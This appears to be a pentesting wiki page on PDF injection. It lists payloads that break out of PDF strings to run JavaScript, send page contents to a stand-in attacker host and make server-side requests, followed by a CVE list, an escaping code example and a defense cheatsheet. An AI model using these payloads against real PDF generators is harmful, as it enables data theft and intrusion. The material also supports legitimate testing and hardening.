PDF Injection


If your input ends up inside a PDF file, you can try to inject PDF data to run JavaScript, perform SSRF, or steal the PDF's contents. PDF syntax is extremely forgiving: if you can break out of the string or dictionary that contains your input, you can append entirely new objects (or new keys in the same object) that Acrobat/Chrome will happily interpret. Since 2024 a series of bug-bounty reports has shown that a single unescaped parenthesis or back-slash is enough for full script execution.

TL;DR – Modern Attack Flow (2024-2026)

  1. Find any user-controlled value that ends up inside a (parenthesis string), /URI ( … ) or /JS ( … ) field of a generated PDF.
  2. Inject ) (to close the string) followed by one of the primitives below, and finish with another opening parenthesis to keep the syntax valid.
  3. Deliver the malicious PDF to the victim (or to a backend service that renders the file automatically – good for blind bugs).
  4. Your payload runs in the PDF viewer:
  • Chrome / Edge → PDFium sandbox
  • Firefox → PDF.js (see CVE-2024-4367)
  • Acrobat → full JavaScript API (can exfiltrate arbitrary file contents with this.getPageNthWord)

Example (annotation link hijack):

(https://victim.internal/) ) /A << /S /JavaScript /JS (app.alert("PDF pwned")) >> /Next (

The first ) closes the original URI string; we then add a new Action dictionary that Acrobat will execute when the user clicks the link.

Useful Injection Primitives

  • JavaScript on open
    Payload: /OpenAction << /S /JavaScript /JS (app.alert(1)) >>
    Notes: Runs immediately when the document is opened (works in Acrobat, not in Chrome).
  • JavaScript on link
    Payload: /A << /S /JavaScript /JS (fetch('https://attacker.tld/?c='+this.getPageNumWords(0))) >>
    Notes: Works in PDFium & Acrobat if you control a /Link annotation.
  • Blind data exfiltration
    Payload: << /Type /Action /S /URI /URI (https://attacker.tld/?leak=)
    Notes: Combine with this.getPageNthWord inside JS to steal contents.
  • Server-side SSRF
    Payload: same as above, but targeting an internal URL
    Notes: Great when the PDF is rendered by back-office services that honour /URI.
  • Additional Actions (/AA)
    Payload: /AA << /O << /S /JavaScript /JS (app.alert(1)) >> >>
    Notes: Attach to a Page/Annotation/Form dictionary so it runs on open or when the element gets focus.
  • Line break for new objects
    Payload: \nendobj\n10 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobj
    Notes: If the library lets you add newline characters you can create entirely new objects.

Embedded Actions as Injection Targets

PDF viewers treat embedded actions such as /OpenAction and /AA (Additional Actions) as first-class features that can run when the document is opened or when a specific event fires. If you can inject into any dictionary that accepts actions (Catalog, Page, Annotation, or Form field), you can plant an /AA tree and make JavaScript start on open/focus.

Example payload for generator-side object injection (close the original string/dictionary and insert /AA):

) >> /AA << /O << /S /JavaScript /JS (app.alert('AA fired')) >> >> (

This example matches recent jsPDF issues where attacker-controlled input passed into addJS (or some AcroForm fields) breaks out of the intended JavaScript string and injects an Additional Action dictionary.
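To make the string-boundary problem behind both the annotation-link example and the generator-side /AA injection concrete, here is an added example (not code from this page, jsPDF, or any real library): a hypothetical minimal link-annotation builder in its unsafe and hardened forms, plus a small literal-string reader that applies the ISO 32000 §7.3.4 rules a viewer uses, so you can see exactly where the string ends in each case. The payload it feeds in is a copy of the page's own link-hijack example.

```python
# Added example (not part of this page, jsPDF, or any real library): a
# hypothetical minimal link-annotation builder that shows why the ")" in the
# annotation-link example above ends the URI string early, and how escaping
# per ISO 32000 §7.3.4 (or a hex string) keeps the whole input inside one string.


def escape_pdf_literal(value: str) -> str:
    """Encode a Python string as a PDF literal string ( ... ).

    Backslash, '(' and ')' get a leading backslash; control and non-ASCII
    bytes become \\ddd octal escapes so CR/LF cannot start a new PDF token.
    """
    out = []
    for b in value.encode("latin-1", "replace"):
        c = chr(b)
        if c in "\\()":
            out.append("\\" + c)
        elif b < 0x20 or b > 0x7E:
            out.append("\\%03o" % b)
        else:
            out.append(c)
    return "(" + "".join(out) + ")"


def hex_pdf_string(value: str) -> str:
    """Alternative from the defense cheatsheet: a hex string <...> contains no
    delimiter the input could supply, so nothing needs escaping."""
    return "<" + value.encode("latin-1", "replace").hex().upper() + ">"


def build_link_unsafe(uri: str) -> str:
    # Vulnerable pattern: raw input concatenated between parentheses.
    return "<< /Type /Annot /Subtype /Link /A << /S /URI /URI (" + uri + ") >> >>"


def build_link_safe(uri: str) -> str:
    # Hardened: the input is encoded as exactly one literal string.
    return "<< /Type /Annot /Subtype /Link /A << /S /URI /URI " + escape_pdf_literal(uri) + " >> >>"


def literal_string_end(data: str, start: int) -> int:
    """Index just past the literal string that starts at data[start] == '('.

    Follows the §7.3.4 rules a viewer applies: unescaped parentheses nest and
    must balance, and a backslash escapes the character after it.
    """
    if data[start] != "(":
        raise ValueError("expected '('")
    depth = 0
    i = start
    while i < len(data):
        c = data[i]
        if c == "\\":
            i += 2          # skip the escaped character
            continue
        if c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return i + 1
        i += 1
    raise ValueError("unterminated literal string")


def split_after_uri(annot: str):
    """Return (the /URI string token as a viewer reads it, everything after it).

    Anything in the second element that came from the input now sits outside
    the string, i.e. it is parsed as dictionary keys and values.
    """
    start = annot.index("/URI (") + 5
    end = literal_string_end(annot, start)
    return annot[start:end], annot[end:]


if __name__ == "__main__":
    # Constructed copy of the annotation-link payload shown above.
    payload = 'https://victim.internal/) ) /A << /S /JavaScript /JS (app.alert("PDF pwned")) >> /Next ('
    for builder in (build_link_unsafe, build_link_safe):
        token, rest = split_after_uri(builder(payload))
        print(builder.__name__, "->", token, "| outside string:", rest.strip())
```

With the unsafe builder the URI token ends at the first unescaped `)` and `/A << /S /JavaScript ... >>` lands outside the string as dictionary content; with the hardened builder every parenthesis is escaped and the only thing left after the token is the builder's own `>> >>`.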

Blind Enumeration Trick

Gareth Heyes (PortSwigger) published a one-liner that enumerates every object inside an unknown document, useful when you cannot see the generated PDF:

) /JS (for(i in this){try{this.submitForm('https://x.tld?'+i+'='+this[i])}catch(e){}}) /S /JavaScript /A << >> (

The code iterates over the Acrobat DOM and makes outbound requests for every property/value pair, giving you a JSON-ish dump of the file. See the white-paper “Portable Data exFiltration” for the full technique.

Real-World Bugs (2023-2026)

  • CVE-2026-25755 – jsPDF addJS PDF object injection: attacker-controlled strings can close the JS literal and inject /AA/O/JavaScript actions that execute on open/focus.
  • CVE-2024-4367 – Arbitrary JavaScript execution in Firefox's PDF.js prior to 4.2.67 bypassed the sandbox using a crafted /JavaScript action.
  • Bug bounty 2024-05 – A major fintech allowed customer-supplied invoice notes into /URI; the report paid $10k after demonstrating SSRF to an internal metadata host using a file:/// URI.
  • CVE-2023-26155 – node-qpdf command injection via an unsanitised PDF path shows the importance of escaping backslashes and parentheses even before the PDF layer.

Defense Cheatsheet

  1. Never concatenate raw user input into () strings or names. Escape \, (, ) as required by §7.3 of the PDF spec, or use hex strings <...>.
  2. If you build links, prefer /URI (https://…) that you fully URL-encode; block javascript: schemes in client viewers.
  3. Remove or validate /OpenAction, /AA (additional actions), /Launch, /SubmitForm and /ImportData dictionaries when post-processing PDFs.
  4. Server-side, render untrusted PDFs with a headless converter (e.g. qpdf --decrypt --linearize) that strips JavaScript and external actions.
  5. Update PDF viewers; PDF.js < 4.2.67 and Acrobat Reader before the July 2024 patches allowed trivial code execution.
  6. If you use client-side generators (e.g. jsPDF), do not pass untrusted input to addJS or AcroForm setters that end up inside PDF action dictionaries.
